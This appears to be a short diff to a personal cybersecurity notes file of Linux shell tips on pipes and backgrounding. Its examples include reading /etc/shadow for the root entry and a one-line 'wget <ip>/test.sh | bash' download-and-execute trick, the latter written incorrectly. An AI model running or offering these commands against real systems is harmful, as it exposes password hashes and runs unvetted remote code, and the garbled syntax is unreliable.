Paradoxxs/Cybersecurity/Linux.md

 ### tip and tricks

 | allows you append command to another one cat /etc/shadow | grep root
+you can also it too download and execute in one line. wget <ip>/test.sh | bash

 & allow you to continue to  use terminal e.g python -m http.server &